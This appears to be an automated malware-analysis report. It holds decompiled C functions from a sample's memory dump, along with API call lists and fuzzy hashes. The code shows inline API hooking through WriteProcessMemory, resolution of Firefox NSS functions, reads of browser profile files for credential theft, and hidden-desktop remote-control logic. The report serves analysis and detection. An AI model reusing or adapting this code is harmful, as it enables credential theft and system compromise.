    						_t279 =  *(_t286 - 0x10) >> 0x0000000a & 0x00000008;
    						_v1028.wHour = _t279;
    						if(_t258 == 0) {
    							_t254 = _a8;
    							L6:
    							_t259 =  *(_t286 + 4);
    							_v1052 = _v1052 & 0x00000000;
    							_v1064 = _v1064 & 0x00000000;
    							_t158 =  *((intOrPtr*)(_t286 + 8)) + _t259;
    							_v1028.wSecond = _t158;
    							if(_t259 >= _t158) {
    								L35:
    								_t159 =  *(_t286 - 0x10);
    								_t294 = 0;
    								if((_t159 & 0x00000008) != 0 && _v1052 != 0) {
    									if((_t159 & 0x00000200) == 0) {
    										_t255 = E004070C5(_t159 | 0xffffffff, 0, _a4);
    										__eflags = _t255;
    										if(_t255 != 0) {
    											_t188 = 9;
    											E00405B00(_t188,  &_v996);
    											_push(_v1052);
    											E0040ED2D(_t259, _t279, __eflags, 0xc9, _t255, 0,  &_v996, _t255);
    											_t309 = _t309 + 0x18;
    											E00406E85(_t255);
    										}
    									} else {
    										_t280 = 0x3c;
    										E00406F38( &_v996,  &_v996, 0, _t280);
    										_v992 =  &_v800;
    										_v1008 = _t280;
    										_v988 = 0x103;
    										if(InternetCrackUrlA(_a4, 0, 0,  &_v1008) == 1 && _v992 > 0) {
    											GetSystemTime( &_v1028);
    											_t306 =  &_v876;
    											_t199 = 8;
    											E00405B00(_t199,  &_v876);
    											_push(_v1028.wDay & 0x0000ffff);
    											_push(_v1028.wMonth & 0x0000ffff);
    											_push((_v1028.wYear & 0x0000ffff) - 0x7d0);
    											_push( &_v804);
    											E00407B78( &_v876, 0x104,  &_v540, _t306);
    											_t309 = _t309 + 0x14;
    											E0040EB83(_t259, 0x104, 2, 0,  &_v540, _v1068, _v1080);
    											_t286 = _v1084;
    										}
    									}
    									E00406E85(_v1052);
    									_t294 = 0;
    								}
    								if( *((intOrPtr*)(_t286 - 4)) != _t294) {
    									if(( *(_t286 - 0x10) & 0x00000010) == 0) {
    										EnterCriticalSection(0x423fe0);
    										E00406E85( *0x423ff8);
    										_t168 = E004072E3(E00406E85( *0x423ffc) | 0xffffffff,  *((intOrPtr*)(_t286 - 0xc)));
    										 *0x423ff8 = _t168;
    										__eflags = _t168 | 0xffffffff;
    										 *0x423ffc = E004072E3(_t168 | 0xffffffff,  *((intOrPtr*)(_t286 - 4)));
    										LeaveCriticalSection(0x423fe0);
    										goto L51;
    									}
    									E00413277( &_v860, _t259, 1,  &_v996);
    									if(E0040812A( &_v900,  *((intOrPtr*)(_t286 - 4)), E004079C2( *((intOrPtr*)(_t286 - 4)))) == 0) {
    										goto L51;
    									}
    									_t261 =  &_v860;
    									do {
    										E004071ED( *((intOrPtr*)(_t309 + _t294 + 0xb8)), _t261);
    										_t294 = _t294 + 1;
    										_t261 = _t261 + 4;
    									} while (_t294 < 0x10);
    									 *_t261 = 0;
    									GetLocalTime( &_v876);
    									E0040B104(_t261,  &_v996,  &_v860, 3,  &_v876, 0x10);
    								}
    								goto L51;
    							} else {
    								goto L9;
    								L13:
    								_t279 =  *_t211 & 0x0000ffff;
    								if(_t279 != 4) {
    									_t259 = _t211 + 4;
    									_t218 = E0041A9C1(_v1028.wHour, _t211 + 4, 0,  &_v1056, _t279 - 4,  *_t254 + _v1060,  *_a12 - _v1060);
    									__eflags = _t218;
    									if(_t218 == 0) {
    										L33:
    										if(_v1028.wYear < _v1028.wSecond) {
    											_t259 = _v1028.wYear;
    											L9:
    											_t211 = ( *_t259 & 0x0000ffff) + _t259;
    											_t296 = ( *_t211 & 0x0000ffff) + _t211;
    											_v1028.wYear = _t296 + ( *_t296 & 0x0000ffff);
    											_t279 =  *_t259 & 0x0000ffff;
    											_v1036 = _t259;
    											_v1044 = _t211;
    											_v1040 = _t296;
    											if(( *_t259 & 0x0000ffff) != 4) {
    												goto L11;
    											} else {
    												_v1060 = _v1060 & 0x00000000;
    												goto L13;
    											}
    										}
    										_t286 = _v1048;
    										goto L35;
    									}
    									__eflags =  *_v1036 - 4;
    									_t298 = _v1040;
    									if( *_v1036 != 4) {
    										_t54 =  &_v1056;
    										 *_t54 = _v1056 + _v1060;
    										__eflags =  *_t54;
    									} else {
    										_v1060 = _v1056;
    									}
    									L22:
    									_t259 = _v1056 - _v1060;
    									_t222 =  *(_v1048 - 0x10);
    									_t291 = ( *_t298 & 0x0000ffff) - 4;
    									_v1044 = _t259;
    									if((_t222 & 0x00000004) == 0) {
    										__eflags = _t222 & 0x00000008;
    										if((_t222 & 0x00000008) != 0) {
    											_t224 = E00406E10(_t259 + _t291 + _v1064 + 2,  &_v1052);
    											__eflags = _t224;
    											if(_t224 != 0) {
    												_t301 = _v1052;
    												__eflags = _t291;
    												if(_t291 != 0) {
    													E00406EC1(_v1064 + _t301,  &(_v1040[2]), _t291);
    													_t84 =  &_v1076;
    													 *_t84 = _v1076 + _t291;
    													__eflags =  *_t84;
    												}
    												_t279 = _v1044;
    												_t227 = E00406EC1(_v1064 + _t301,  *_t254 + _v1060, _t279);
    												_t259 = _v1060;
    												__eflags =  *(_t259 - 0x10) & 0x00000100;
    												if(( *(_t259 - 0x10) & 0x00000100) == 0) {
    													_t228 = E0040BAAB(_t227, _t279);
    													_t95 =  &_v1068;
    													 *_t95 = _v1068 + _t228;
    													__eflags =  *_t95;
    													_t254 = _a8;
    												} else {
    													_v1064 = _v1064 + _t279;
    												}
    												_t229 = _v1064;
    												 *((char*)(_t229 + _t301)) = 0xa;
    												_t230 = _t229 + 1;
    												__eflags = _t230;
    												_v1064 = _t230;
    												 *((char*)(_t230 + _t301)) = 0;
    											}
    										}
    									} else {
    										_v1036 =  *_a12 - _t259 + _t291;
    										_t240 = E00406E55( *_a12 - _t259 + _t291);
    										_v1044 = _t240;
    										if(_t240 != 0) {
    											_t279 = _v1060;
    											_t242 = E00406EC1(E00406EC1(_t240,  *_t254, _v1060) + _v1060,  &(_t298[2]), _t291);
    											_t303 = _a12;
    											_t259 =  *_t254 + _v1080;
    											E00406EC1(_t242 + _t291 + _v1060,  *_t254 + _v1080,  *_t303 - _v1080);
    											E00406E85( *_t254);
    											_v1072 = _v1072 + 1;
    											 *_t254 = _v1084;
    											 *_t303 = _v1076;
    										}
    									}
    									goto L33;
    								}
    								if( *_t259 != _t279) {
    									_t250 = _v1060;
    								} else {
    									_t250 =  *_a12;
    								}
    								_v1056 = _t250;
    								goto L22;
    								L11:
    								_t215 = E0041A9C1(_v1028.wHour, _t259,  &_v1060, 0, _t279 - 4,  *_t254,  *_a12);
    								__eflags = _t215;
    								if(_t215 == 0) {
    									goto L33;
    								}
    								_t298 = _v1040;
    								_t211 = _v1044;
    								_t259 = _v1036;
    								goto L13;
    							}
    						}
    						_v996 = 0x2a3f;
    						_v992 = _t258;
    						_t160 = E004079C2(_t258);
    						_t254 = _a8;
    						_v988 = _t160;
    						_v984 =  *_t254;
    						_t279 = _t279 | 0x00000012;
    						_v980 =  *_a12;
    						_v968 = _t279;
    						if(E00407E09( &_v996) != 0) {
    							goto L6;
    						}
    						L51:
    						_t286 = _t286 + 0x1c;
    						_t150 =  &(_v1028.wDayOfWeek);
    						 *_t150 = _v1028.wDayOfWeek - 1;
    						_v1048 = _t286;
    					} while ( *_t150 != 0);
    					goto L52;
    				}
    			}

    APIs
    • InternetCrackUrlA.WININET(?,?,?,00000000), ref: 0041B984
    • GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 0041B9A2
    • GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?,-00423E5C,?,?), ref: 0041BABC
    • EnterCriticalSection.KERNEL32(00423FE0,-00423E5C,?,?), ref: 0041BAE8
    • LeaveCriticalSection.KERNEL32(00423FE0,?,?), ref: 0041BB25
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalSectionTime$CrackEnterInternetLeaveLocalSystem
    • String ID: ?*$?B
    • API String ID: 2400141425-740349515
    • Opcode ID: f15823de3769cf40323cf1d45a756d3385d2f647c5bc43e1bb7dd426b2c15765
    • Instruction ID: 8f6f80360856d367ccd0f6ec72bfea998410952d63b0662bca32a2657afa8ceb
    • Opcode Fuzzy Hash: f15823de3769cf40323cf1d45a756d3385d2f647c5bc43e1bb7dd426b2c15765
    • Instruction Fuzzy Hash: 33E19CB15083019FD710DF69C880AABB7E5FF88314F04492EF895A7391D738E945CBAA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E004184D9(char* __ecx, char* __edx, void* __eflags) {
    				intOrPtr _v8;
    				char _v12;
    				intOrPtr _v16;
    				char* _v20;
    				char _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				char _v64;
    				char _v84;
    				char _v108;
    				char _v152;
    				char _v180;
    				char _v252;
    				short _v766;
    				char _v772;
    				short _v1292;
    				void* __edi;
    				void* __esi;
    				void* _t46;
    				void* _t48;
    				void* _t53;
    				void* _t57;
    				void* _t59;
    				void* _t61;
    				void* _t68;
    				void* _t70;
    				void* _t75;
    				WCHAR* _t100;
    				signed int _t101;
    				WCHAR* _t103;
    				char* _t108;
    				intOrPtr _t109;
    				void* _t112;
    				intOrPtr _t125;
    
    				_t99 = __edx;
    				_t98 = __ecx;
    				E00406F38( &_v12,  &_v12, 0, 8);
    				_t46 = 0x6a;
    				E00405B00(_t46,  &_v252);
    				_t48 = 0x6b;
    				E00405B00(_t48,  &_v108);
    				_t100 =  &_v772;
    				_t53 = E0040AFA9(0x80000001, _t98, _t100,  &_v252,  &_v108, 0x104);
    				if(_t53 != 0xffffffff) {
    					_t115 = _t53;
    					if(_t53 != 0) {
    						ExpandEnvironmentStringsW(_t100,  &_v1292, 0x104);
    						E004182ED(_t99, _t115,  &_v1292,  &_v12);
    						PathRemoveFileSpecW( &_v1292);
    					}
    				}
    				_t101 = 0;
    				if(_v8 != 0) {
    					L14:
    					_t125 = _v8;
    					goto L15;
    				} else {
    					_t57 = 0x6d;
    					E00405B00(_t57,  &_v64);
    					_t59 = 0x6e;
    					E00405B00(_t59,  &_v152);
    					_t108 =  &_v84;
    					_t61 = 0x6f;
    					E00405B00(_t61, _t108);
    					_v24 =  &_v64;
    					_v20 =  &_v152;
    					_v40 = 0x24;
    					_v36 = 0x1a;
    					_v32 = 0x26;
    					_v28 = 0x23;
    					_v16 = _t108;
    					do {
    						_t109 =  *((intOrPtr*)(_t112 + _t101 * 4 - 0x24));
    						__imp__SHGetFolderPathW(0, _t109, 0, 0,  &_v772);
    						if(0 == 0) {
    							_t118 = _t109 - 0x24;
    							if(_t109 == 0x24) {
    								E004182AB(_t118,  &_v772,  &_v12, 0);
    								_v766 = 0;
    							}
    							_t99 =  &_v24;
    							_t98 =  &_v772;
    							E0040C5AE( &_v772,  &_v24, 0, 3, 2, E00418490,  &_v12, 0, 0, 0);
    						}
    						_t101 = _t101 + 1;
    					} while (_t101 < 4);
    					if(_v8 != 0) {
    						L15:
    						if(_t125 <= 0) {
    							return E00406E85(_v12);
    						}
    						_push(0xcb);
    						return E00416CBC(_t99, _v12, 0x70);
    					}
    					_t68 = 0x6a;
    					E00405B00(_t68,  &_v180);
    					_t70 = 0x6c;
    					E00405B00(_t70,  &_v64);
    					_t103 =  &_v772;
    					_t75 = E0040AFA9(0x80000001, _t98, _t103,  &_v180,  &_v64, 0x104);
    					if(_t75 != 0xffffffff) {
    						_t124 = _t75;
    						if(_t75 != 0) {
    							ExpandEnvironmentStringsW(_t103,  &_v1292, 0x104);
    							E004182AB(_t124,  &_v1292,  &_v12, 1);
    						}
    					}
    					goto L14;
    				}
    			}

    0x004184d9
    0x004184d9
    0x004184ed
    0x004184fa
    0x004184fb
    0x00418505
    0x00418506
    0x0041851b
    0x00418526
    0x0041852e
    0x00418530
    0x00418532
    0x0041853f
    0x00418550
    0x0041855c
    0x0041855c
    0x00418532
    0x00418562
    0x00418567
    0x00418687
    0x00418687
    0x00000000
    0x0041856d
    0x00418572
    0x00418573
    0x00418580
    0x00418581
    0x00418588
    0x0041858b
    0x0041858c
    0x00418594
    0x0041859d
    0x004185a2
    0x004185a9
    0x004185b0
    0x004185b7
    0x004185be
    0x004185c1
    0x004185c1
    0x004185d2
    0x004185da
    0x004185dc
    0x004185df
    0x004185ed
    0x004185f4
    0x004185f4
    0x0041860d
    0x00418610
    0x00418616
    0x00418616
    0x0041861b
    0x0041861c
    0x00418625
    0x0041868b
    0x0041868b
    0x00000000
    0x004186a2
    0x00418690
    0x00000000
    0x00418698
    0x0041862f
    0x00418630
    0x0041863a
    0x0041863b
    0x0041864b
    0x00418656
    0x0041865e
    0x00418660
    0x00418662
    0x0041866f
    0x00418682
    0x00418682
    0x00418662
    0x00000000
    0x0041865e

    APIs
      • Part of subcall function 0040AFA9: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00413CB1,?,?,00000104,.exe,00000000), ref: 0040AFBE
    • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 0041853F
      • Part of subcall function 004182ED: GetPrivateProfileStringW.KERNEL32 ref: 00418324
      • Part of subcall function 004182ED: StrStrIW.SHLWAPI(00000001,?), ref: 004183AC
      • Part of subcall function 004182ED: StrStrIW.SHLWAPI(00000001,?), ref: 004183BD
      • Part of subcall function 004182ED: GetPrivateProfileStringW.KERNEL32 ref: 004183D9
      • Part of subcall function 004182ED: GetPrivateProfileStringW.KERNEL32 ref: 004183F7
    • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,00000000,00000001), ref: 0041855C
      • Part of subcall function 00406E85: HeapFree.KERNEL32(00000000,00000000,0040867C,00000000,?,?,?,004127CC,00000000,00412CA6), ref: 00406E98
    • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 004185D2
    • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000001), ref: 0041866F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: PrivateProfileString$EnvironmentExpandPathStrings$FileFolderFreeHeapOpenRemoveSpec
    • String ID: #$$$&
    • API String ID: 1517737059-1941049543
    • Opcode ID: e581dc2a110ed528eb084725a70375682de48580ed23019dc1fff705474752ce
    • Instruction ID: 9d47f1990da3d837f279198adbd04c724eba6bbf34df87a64b458f68d2b7b92b
    • Opcode Fuzzy Hash: e581dc2a110ed528eb084725a70375682de48580ed23019dc1fff705474752ce
    • Instruction Fuzzy Hash: AF514D72E00218AADF10EBA5CC59FDF77BCEB04314F5005ABB509F7181DB78AA858B59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E0040B6C1(void* __eax, intOrPtr __ecx, void* __edx, void* __eflags, void* _a4, char _a8) {
    				char _v8;
    				DWORD* _v12;
    				intOrPtr _v47;
    				void _v48;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				void* _t47;
    				void* _t58;
    				intOrPtr _t61;
    				void* _t62;
    				void* _t63;
    				intOrPtr* _t66;
    				long _t68;
    				DWORD* _t69;
    				void* _t71;
    
    				_t63 = __edx;
    				_t61 = __ecx;
    				_t58 = __eax;
    				_t69 = 0;
    				_v12 = 0;
    				if(E0040B67C(_a4) < 0x1e) {
    					L18:
    					return _v12;
    				}
    				_t3 =  &_v8; // 0x412a76
    				if(VirtualProtectEx(0xffffffff, _a4, 0x1e, 0x40, _t3) == 0) {
    					goto L18;
    				}
    				E00406F38( &_v48,  &_v48, 0xffffff90, 0x23);
    				if(ReadProcessMemory(0xffffffff, _a4,  &_v48, 0x1e, 0) == 0) {
    					L17:
    					_t30 =  &_v8; // 0x412a76
    					_t31 =  &_v8; // 0x412a76
    					VirtualProtectEx(0xffffffff, _a4, 0x1e,  *_t31, _t30);
    					goto L18;
    				} else {
    					_t66 =  &_v48;
    					_push(0);
    					_push(_t66);
    					while(1) {
    						_t47 = E0041D910(_t58, _t61, _t63, _t66, _t69);
    						if(_t47 == 0xffffffff) {
    							break;
    						}
    						_t69 = _t69 + _t47;
    						if(_t69 > 0x1e) {
    							L16:
    							goto L17;
    						}
    						_t61 =  *_t66;
    						if(_t61 == 0xe9 || _t61 == 0xe8) {
    							if(_t47 == 5) {
    								_t10 =  &_a8; // 0x422020
    								 *((intOrPtr*)(_t66 + 1)) =  *((intOrPtr*)(_t66 + 1)) + _a4 -  *_t10;
    							}
    						}
    						_push(0);
    						if(_t69 >= 5) {
    							_t16 =  &_a8; // 0x422020
    							_t17 = _t69 + 5; // 0x5
    							_t68 = _t17;
    							 *((intOrPtr*)(_t71 + _t69 - 0x2b)) = _a4 -  *_t16 - 5;
    							_t21 =  &_a8; // 0x422020
    							 *((char*)(_t71 + _t69 - 0x2c)) = 0xe9;
    							if(WriteProcessMemory(0xffffffff,  *_t21,  &_v48, _t68, ??) != 0) {
    								_t62 = _a4;
    								_v48 = 0xe9;
    								_v47 = _t58 - _t62 - 5;
    								E00404C22(_t62, _a8);
    								if(WriteProcessMemory(0xffffffff, _t62,  &_v48, 5, 0) != 0) {
    									_v12 = _t68;
    								}
    							}
    							goto L16;
    						}
    						_t66 = _t71 + _t69 - 0x2c;
    						_push(_t66);
    					}
    					goto L16;
    				}
    			}


    0x0040b6c1
    0x0040b6c1
    0x0040b6c9
    0x0040b6ce
    0x0040b6d0
    0x0040b6db
    0x0040b7d5
    0x0040b7db
    0x0040b7db
    0x0040b6e1
    0x0040b6f6
    0x00000000
    0x00000000
    0x0040b704
    0x0040b71d
    0x0040b7c1
    0x0040b7c1
    0x0040b7c5
    0x0040b7cf
    0x00000000
    0x0040b723
    0x0040b724
    0x0040b727
    0x0040b72a
    0x0040b75e
    0x0040b75e
    0x0040b766
    0x00000000
    0x00000000
    0x0040b72d
    0x0040b732
    0x0040b7c0
    0x00000000
    0x0040b7c0
    0x0040b738
    0x0040b73d
    0x0040b747
    0x0040b74c
    0x0040b74f
    0x0040b74f
    0x0040b747
    0x0040b752
    0x0040b757
    0x0040b76d
    0x0040b770
    0x0040b770
    0x0040b776
    0x0040b77f
    0x0040b782
    0x0040b793
    0x0040b795
    0x0040b7a0
    0x0040b7a4
    0x0040b7a7
    0x0040b7bb
    0x0040b7bd
    0x0040b7bd
    0x0040b7bb
    0x00000000
    0x0040b793
    0x0040b759
    0x0040b75d
    0x0040b75d
    0x00000000
    0x0040b768

    APIs
      • Part of subcall function 0040B67C: VirtualQueryEx.KERNEL32(000000FF,?,?,0000001C,00000008,?,?,?,?,00404BC2,00000000,00000000,00000034,00404F4D,00422020,00000000), ref: 0040B691
    • VirtualProtectEx.KERNEL32(000000FF,00000000,0000001E,00000040,v*A,-00000008,00000034,?,?,00404CE3,?,00000000,?,?,00404F4D,00422020), ref: 0040B6EE
    • ReadProcessMemory.KERNEL32(000000FF,00000000,?,0000001E,00000000,?,00000090,00000023,?,?,00404CE3,?,00000000,?,?,00404F4D), ref: 0040B715
    • WriteProcessMemory.KERNEL32(000000FF, B,?,00000005,00000000,?,00000000,00000000,?,?,00404CE3,?,00000000,?,?,00404F4D), ref: 0040B78F
    • WriteProcessMemory.KERNEL32(000000FF,?,000000E9,00000005,00000000,?,?,00404CE3,?,00000000,?,?,00404F4D,00422020,00000000,00412A76), ref: 0040B7B7
    • VirtualProtectEx.KERNEL32(000000FF,?,0000001E,v*A,v*A,?,?,00404CE3,?,00000000,?,?,00404F4D,00422020,00000000,00412A76), ref: 0040B7CF
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: MemoryProcessVirtual$ProtectWrite$QueryRead
    • String ID: B$v*A
    • API String ID: 390532180-1725069656
    • Opcode ID: b0ba6ac3e975a08e1d1da889f11fcee4f3bd4a750b6ca4dfcf6660638269c2b1
    • Instruction ID: 259e99843ddda2d71a16a13db45966a43395f92bd68d4a3c124ed256cea5f2d2
    • Opcode Fuzzy Hash: b0ba6ac3e975a08e1d1da889f11fcee4f3bd4a750b6ca4dfcf6660638269c2b1
    • Instruction Fuzzy Hash: 73318072900209AADF109FB8CC84EDE7B69EB49770F108726F935B71D0D774DA408BA8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00414818(struct HINSTANCE__* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
    				_Unknown_base(*)()* _t12;
    				struct HINSTANCE__* _t14;
    
    				 *0x423e5c =  *0x423e5c & 0x00000000;
    				 *0x423e60 =  *0x423e60 & 0x00000000;
    				_t14 = __eax;
    				InitializeCriticalSection(0x423e40);
    				 *0x423e58 = _a4;
    				 *0x423e34 = _a8;
    				 *0x423e64 = _a12;
    				 *0x423e38 = _t14;
    				 *0x423964 = _a16;
    				 *0x42385c = GetProcAddress(_t14, "PR_GetNameForIdentity");
    				 *0x423e3c = GetProcAddress( *0x423e38, "PR_SetError");
    				_t12 = GetProcAddress( *0x423e38, "PR_GetError");
    				 *0x4237f4 = _t12;
    				return _t12;
    			}


    0x00414818
    0x0041481f
    0x0041482c
    0x0041482e
    0x00414838
    0x00414841
    0x0041484f
    0x00414858
    0x00414865
    0x00414877
    0x00414889
    0x0041488e
    0x00414890
    0x00414896

    APIs
    • InitializeCriticalSection.KERNEL32(00423E40,74B04EE0,00404FBD,00422360), ref: 0041482E
    • GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 0041486A
    • GetProcAddress.KERNEL32(PR_SetError), ref: 0041487C
    • GetProcAddress.KERNEL32(PR_GetError), ref: 0041488E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressProc$CriticalInitializeSection
    • String ID: PR_GetError$PR_GetNameForIdentity$PR_SetError
    • API String ID: 2804437462-2578621715
    • Opcode ID: 7172d9af390fc3bc83bcbf2735f272b0854a5d130ae1bc2071b2762776021cc0
    • Instruction ID: 0a6281f6c03bb19aeb96810d34207816c7c6052225c900204128a62ca049c41a
    • Opcode Fuzzy Hash: 7172d9af390fc3bc83bcbf2735f272b0854a5d130ae1bc2071b2762776021cc0
    • Instruction Fuzzy Hash: 6601FBB5B01350AFC720CF68EC44A16BFF0F749762B42443AB458A3260D3BC9949CF48
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E0041CEA9(void* __edx, intOrPtr* _a4) {
    				char _v524;
    				char _v544;
    				char _v556;
    				intOrPtr _v572;
    				char _v924;
    				char _v1028;
    				char _v1040;
    				char _v1060;
    				intOrPtr _v1104;
    				intOrPtr _v1108;
    				intOrPtr _v1112;
    				intOrPtr _v1116;
    				char _v1120;
    				char* _v1124;
    				intOrPtr _v1128;
    				char _v1132;
    				intOrPtr _v1144;
    				signed short _v1146;
    				char _v1148;
    				signed int _v1152;
    				signed int _v1156;
    				char _v1157;
    				signed int _v1160;
    				void* _v1164;
    				void* _v1168;
    				char _v1177;
    				char _v1180;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t59;
    				void* _t62;
    				signed int _t71;
    				char _t77;
    				char* _t85;
    				char _t88;
    				char _t95;
    				short _t100;
    				intOrPtr* _t105;
    				void* _t111;
    				char _t112;
    				signed int _t118;
    				signed int _t119;
    				void* _t123;
    
    				_t111 = __edx;
    				_t105 = _a4;
    				_t59 =  *(_t105 + 4);
    				_push(_t118);
    				_t119 = _t118 | 0xffffffff;
    				_v1152 = _t119;
    				_v1156 = _t119;
    				if(_t59 == _t119 || _t59 == 0xfffffffe) {
    					L4:
    					_t62 = E00407504( *((intOrPtr*)( *_t105 + 8)), _t108, 0);
    					_t109 =  *_t105;
    					_t63 = E00409F0E(_t62,  *_t105,  *((intOrPtr*)( *_t105 + 4)));
    					_v1160 = _t63;
    					_t133 = _t63 - _t119;
    					if(_t63 == _t119) {
    						goto L20;
    					}
    					E0040A280(_t109, _t63);
    					E0040A23E(_v1160);
    					_push(_t105 + 8);
    					_push(3);
    					_push(_v1164);
    					_t123 = 4;
    					if(E0040D51D(_t109, _t123, _t133) == 0) {
    						goto L20;
    					}
    					_t71 =  *(_t105 + 4);
    					if(_t71 == 0xfffffffe) {
    						SetThreadPriority(GetCurrentThread(), 1);
    						E00412E8D(0x2937498d,  &_v1028, 0);
    						_t63 = E0040EF1F(_t109, __eflags,  &_v1040);
    						__eflags = _t63;
    						if(_t63 == 0) {
    							goto L20;
    						}
    						_t77 = E0040D5CF(_t109, _t111,  &_v924, 1);
    						__eflags = _t77;
    						if(_t77 == 0) {
    							L19:
    							_t63 = E0040D83A( &_v924, 1);
    							goto L20;
    						} else {
    							__imp__GetShellWindow();
    							__eflags = _t77;
    							_v1157 = _t77 != 0;
    							__eflags = _v1157;
    							if(_v1157 == 0) {
    								E00405B00(0xa8,  &_v1132);
    								_t85 =  &_v524;
    								__imp__SHGetFolderPathW(0, 0x25, 0, 0, _t85);
    								__eflags = _t85;
    								if(_t85 == 0) {
    									_t88 = E0040C70A( &_v1132,  &_v544,  &_v544);
    									__eflags = _t88;
    									if(_t88 != 0) {
    										_t112 = 0x44;
    										E00406F38( &_v1120,  &_v1120, 0, _t112);
    										_v1124 =  &_v1060;
    										_v1132 = _t112;
    										_t95 = E0040874C( &_v556, 0, 0,  &_v1132,  &_v1180);
    										__eflags = _t95;
    										if(_t95 != 0) {
    											WaitForSingleObject(_v1168, 0x1388);
    											CloseHandle(_v1164);
    											CloseHandle(_v1168);
    											_v1177 = 1;
    										}
    									}
    								}
    							}
    							SystemParametersInfoW(0x1003, 0, 0, 0);
    							__eflags = _v1157 - 1;
    							if(__eflags == 0) {
    								_v1132 =  &_v924;
    								_v1128 = 0x40da49;
    								_v1124 = 0x40da4c;
    								_v1120 = E0040DA4F;
    								_v1116 = E0040DA73;
    								_v1112 = E0040DABA;
    								_v1108 = E0040DAEF;
    								_v1104 = 0x40da49;
    								E004117CB(__eflags, _v1156,  &_v1132, _v924, _v572);
    							}
    							goto L19;
    						}
    					} else {
    						if(_t71 == 0xffffffff) {
    							_t63 = E00406DC3(_v1156, _t109);
    						} else {
    							_push(_v1152);
    							_t63 = E0040A081(_v1156);
    							_t105 = _a4;
    						}
    						goto L20;
    					}
    				} else {
    					_t100 = 2;
    					_v1148 = _t100;
    					_t108 =  *(_t105 + 4) << 8;
    					_v1146 =  *(_t105 + 5) & 0x000000ff |  *(_t105 + 4) << 0x00000008;
    					_v1144 = 0x100007f;
    					_t63 = E00409ECD( &_v1148);
    					_v1152 = _t63;
    					if(_t63 == _t119) {
    						L20:
    						E0040A228(E0040A228(_t63, _v1156), _v1152);
    						E00406E85(_t105);
    						return 0;
    					} else {
    						E0040A280(_t108, _t63);
    						goto L4;
    					}
    				}
    			}


    0x0041cea9
    0x0041ceb6
    0x0041ceb9
    0x0041cebc
    0x0041cebd
    0x0041cec1
    0x0041cec5
    0x0041cecb
    0x0041cf11
    0x0041cf18
    0x0041cf1d
    0x0041cf22
    0x0041cf27
    0x0041cf2b
    0x0041cf2d
    0x00000000
    0x00000000
    0x0041cf34
    0x0041cf3d
    0x0041cf45
    0x0041cf46
    0x0041cf48
    0x0041cf4e
    0x0041cf56
    0x00000000
    0x00000000
    0x0041cf5c
    0x0041cf62
    0x0041cf95
    0x0041cfab
    0x0041cfb8
    0x0041cfbd
    0x0041cfbf
    0x00000000
    0x00000000
    0x0041cfce
    0x0041cfd3
    0x0041cfd5
    0x0041d101
    0x0041d10a
    0x00000000
    0x0041cfdb
    0x0041cfdb
    0x0041cfe1
    0x0041cfe3
    0x0041cfe8
    0x0041cfed
    0x0041cffc
    0x0041d001
    0x0041d00e
    0x0041d014
    0x0041d016
    0x0041d023
    0x0041d028
    0x0041d02a
    0x0041d02e
    0x0041d036
    0x0041d042
    0x0041d05a
    0x0041d05e
    0x0041d063
    0x0041d065
    0x0041d070
    0x0041d080
    0x0041d086
    0x0041d088
    0x0041d088
    0x0041d065
    0x0041d02a
    0x0041d016
    0x0041d095
    0x0041d09b
    0x0041d0a0
    0x0041d0b7
    0x0041d0c4
    0x0041d0cc
    0x0041d0d4
    0x0041d0dc
    0x0041d0e4
    0x0041d0ec
    0x0041d0f4
    0x0041d0fc
    0x0041d0fc
    0x00000000
    0x0041d0a0
    0x0041cf64
    0x0041cf67
    0x0041cf82
    0x0041cf69
    0x0041cf69
    0x0041cf71
    0x0041cf76
    0x0041cf76
    0x00000000
    0x0041cf67
    0x0041ced2
    0x0041ced8
    0x0041ced9
    0x0041cee2
    0x0041ceed
    0x0041cef2
